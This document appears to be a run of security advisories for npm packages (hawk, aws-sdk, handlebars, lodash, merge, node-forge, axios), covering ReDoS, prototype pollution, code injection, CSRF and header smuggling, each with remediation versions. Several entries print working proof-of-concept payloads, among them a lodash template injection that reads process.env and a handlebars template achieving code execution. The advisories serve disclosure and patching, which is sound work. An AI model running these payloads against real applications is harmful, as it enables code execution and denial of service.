Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

• A The string must start with the letter 'A'
• (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
• D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

1. CCC
2. CC+C
3. C+CC
4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade hawk to version 9.0.1 or higher.

References

• GitHub Advisory
• GitHub Commit
• GitHub PR

Overview

Affected versions of this package are vulnerable to Prototype Pollution. If an attacker submits a malicious INI file to an application that parses it with loadSharedConfigFiles , they will pollute the prototype on the application. This can be exploited further depending on the context.

PoC by Eugene Lim:

payload.toml:

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var sharedIniFileLoader = require('@aws-sdk/shared-ini-file-loader')

async function main() {
var parsed = await sharedIniFileLoader.loadSharedConfigFiles({ filepath: './payload.toml' })
console.log(parsed)
console.log(parsed.__proto__)
console.log({}.__proto__)
console.log(polluted)
}

main()

> node poc.js
{
configFile: { default: { region: 'ap-southeast-1' } },
credentialsFile: {}
}
{ polluted: '"polluted"' }
{ polluted: '"polluted"' }
"polluted"

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade aws-sdk to version 2.814.0 or higher.

References

• GitHub Commit (v2 SDK)
• GitHub Commit (v3 SDK)

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution. A Prototype Pollution allowing Remote Code Execution can be exploited using the constructor, via the 'lookup' helper. This vulnerability is due to an incomplete fix for: SNYK-JS-HANDLEBARS-173692

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade handlebars to version 3.0.7, 4.1.2, 4.0.14 or higher.

References

• GitHub Commit
• GitHub Issue
• SNYK-JS-HANDLEBARS-173692

Overview

handlebars is a extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution. Templates may alter an Object's __proto__ and __defineGetter__ properties, which may allow an attacker to execute arbitrary code on the server through crafted payloads.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as _proto_, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named _proto_ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to _proto_.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade handlebars to version 4.3.0, 3.0.8 or higher.

References

• GitHub Commit

• GitHub Commit

• GitHub Issue

• Reference

• Release Notes

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.

PoC by Snyk

const mergeFn = require('lodash').defaultsDeep;
const payload = '{"constructor": {"prototype": {"a0": true}}}'

function check() {
    mergeFn({}, JSON.parse(payload));
    if (({})[`a0`] === true) {
        console.log(`Vulnerable to Prototype Pollution via ${payload}`);
    }
  }

check();

For more information, check out our blog post

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.17.12 or higher.

References

• GitHub Issue
• GitHub PR
• GitHub PR
• GitHub PR
• Node Security Advisory
• Snyk Blog

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution via the set and setwith functions due to improper user input sanitization.

PoC

lod = require('lodash')
lod.set({}, "__proto__[test2]", "456")
console.log(Object.prototype)

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.17.17 or higher.

References

• HackerOne Report

Overview

merge is a library that allows you to merge multiple objects into one, optionally creating a new cloned object. Similar to the jQuery.extend but more flexible. Works in Node.js and the browser.

Affected versions of this package are vulnerable to Prototype Pollution via _recursiveMerge .

PoC:

const merge = require('merge');

const payload2 = JSON.parse('{"x": {"__proto__":{"polluted":"yes"}}}');

let obj1 = {x: {y:1}};

console.log("Before : " + obj1.polluted);
merge.recursive(obj1, payload2);
console.log("After : " + obj1.polluted);
console.log("After : " + {}.polluted);

Output:

Before : undefined
After : yes
After : yes

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade merge to version 2.1.1 or higher.

References

• GitHub Commit
• Vulnerable Code

Overview

node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to RSA's PKCS#1 v1.5 signature verification code which does not check for tailing garbage bytes after decoding a DigestInfo ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used.

Remediation

Upgrade node-forge to version 1.3.0 or higher.

References

• GitHub Commit

Overview

node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.

Affected versions of this package are vulnerable to Prototype Pollution via the util.setPath function.

Note: version 0.10.0 is a breaking change removing the vulnerable functions.

POC:

const nodeforge = require('node-forge');
var obj = {};
nodeforge.util.setPath(obj, ['__proto__', 'polluted'], true);
console.log(polluted);

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade node-forge to version 0.10.0 or higher.

References

• GitHub Changelog

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Code Injection due the improper validation of options.variable key names in _.template. An attacker can execute arbitrary code at template compilation time by injecting malicious expressions. If Object.prototype has been polluted, inherited properties may also be copied into the imports object and executed.

PoC

var _ = require('lodash');

_.template('', { variable: '){console.log(process.env)}; with(obj' })()

Remediation

Upgrade lodash to version 4.17.21 or higher.

References

• GitHub Commit
• Vulnerable Code
• Nuclei Templates

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to inserting the X-XSRF-TOKEN header using the secret XSRF-TOKEN cookie value in all requests to any server when the XSRF-TOKEN0 cookie is available, and the withCredentials setting is turned on. If a malicious user manages to obtain this value, it can potentially lead to the XSRF defence mechanism bypass.

Workaround

Users should change the default XSRF-TOKEN cookie name in the Axios configuration and manually include the corresponding header only in the specific places where it's necessary.

Remediation

Upgrade axios to version 0.28.0, 1.6.0 or higher.

References

• GitHub Commit
• GitHub Issue
• GitHub Issue
• GitHub PR

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to HTTP Response Splitting via the parseTokens header processing path in lib/core/AxiosHeaders.js. An attacker can smuggle HTTP requests or inject arbitrary headers by supplying a header value containing \r\n, which Axios merges into an outbound request. Under specific conditions, this can be used to exfiltrate cloud metadata tokens, pivot into internal services, or poison downstream HTTP traffic.

Notes

• Exploitation requires prior successful prototype pollution in a third-party dependency, enabling attacker-controlled header data to flow into Axios via configuration merging or AxiosHeaders.set(...).
• IMDSv2 token exfiltration (described in the original vulnerability report as another step in the exploit chain following the smuggling of a PUT request) further depends on the application running in an AWS environment with instance metadata access enabled, and on the Axios process having network access to the metadata endpoint.
• A possible but uncommon vector mentioned in the maintainers' advisory relies on the use of a non standard Axios transport mechanism, e.g. a custom adapter, to bypass Node.js header validation, thereby permitting malformed or injected header values to be transmitted without rejection. In most cases, this vector is blocked by Node.JS's built in header validation.

Remediation

Upgrade axios to version 0.31.0, 1.15.0 or higher.

References

• GitHub Commit
• GitHub Commit (v1 backport)
• GitHub PR
• GitHub Release
• Maintainer's Advisory

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.

POC

<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> 
<script> 
// compile the template 
var s = ` 
{{#with (__lookupGetter__ "__proto__")}} 
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} 
{{#with ../constructor.prototype}} 
{{../../constructor.defineProperty . "hasOwnProperty" ..}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{#with "constructor"}} 
{{#with split}} 
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}} 
{{#with .}} 
{{#with (concat (lookup join (slice 0 1)))}} 
{{#each (slice 2 3)}} 
{{#with (apply 0 ../..)}} 
{{.}} 
{{/with}} 
{{/each}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{/with}} 
`;
var template = Handlebars.compile(s, { 
strict: true 
}); 
// execute the compiled template and print the output to the console console.log(template({})); 
</script>

Remediation

Upgrade handlebars to version 4.7.7 or higher.

References

• GitHub Commit